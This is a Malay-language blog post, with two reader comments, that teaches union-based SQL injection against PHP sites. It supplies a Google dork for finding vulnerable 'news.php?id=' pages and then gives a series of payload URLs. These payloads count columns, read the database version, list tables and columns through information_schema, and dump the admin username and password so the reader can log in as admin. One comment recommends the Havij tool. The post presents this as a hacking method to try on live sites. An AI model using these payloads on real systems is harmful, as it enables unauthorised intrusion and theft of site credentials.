This meth0d called "SQL Injection".
Give it try,Let's Check it 0ut~!
________________________________________________
Sql Injection Tutorial
>>Info<<
Kata kunci yang perlu diketahui
-------------------------------
karakter: ', -
comments: /*, --
-------------------------------
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x
Google Dork yang akan di gunakan ialah "inurl:news.php?id="
Langkah Pertama
[site]/news.php?id=1
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.
contoh:
code:
[site]/news.php?id=1'
atau
[site]/news.php?id=-1
contoh error:
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
Langkah Kedua
Cari jumlah table yang ada di dalam database.
----tambahkan +order+by+1-- diakhir url
Contoh:
Code:
[site]/news.php?id=1+order+by+1--
atau
[site]/news.php?id=1+order+by+1/* periksa secara bepringkat
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/*cari sehingga error keluar
untuk tutorial ini jumlah table yg diperolehi ialah 3.
Langkah Ketiga
Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
-----perintah yang akan digunakan: union+select+1,2,3--
Contoh: angka 2 keluar.
kemudian kita masukkan version() di angka 2,
contoh:
[site]/news.php?id=1+union+select+1,version(),3--
dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log
------
|info|
------
database() = untuk lihat name database yang digunakan
version() = untuk lihat version msql yang digunakan
Langkah Keempat
untuk nampakkan nama2 table yang ada di wenb tersebut, perintah
Table_name ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.
contoh:
[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
Langkah KeLima
Keluarkan kesemua isi yang ada di dalam table tersebut,
group_concat(table_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables+where+table_schema=database() ---> Masukan selepas angka yang terakhir.
Contoh:
[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--
Langkah Ke Enam
Keluar kan kandungan yang ada didalam TABLE
group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHEXA--
|
|
(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)
------
|info|
------
Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/
Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E
Contoh:
[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--
Langkah Ketujuh
Keluarkan hasil isi yang kita berjaya peroleh dari table ADMIN
concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column
Contoh:
[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--
Dan kita akan peroleh username dan password admin untuk website tersebut.
Langkah Terakhir:
Cari Login untuk admin..
Selamat Mencuba.....
Credit to: Hayate Ayasaki
ni kene guna software ape?please help
ReplyDeletepakai manual atau havij..
ReplyDelete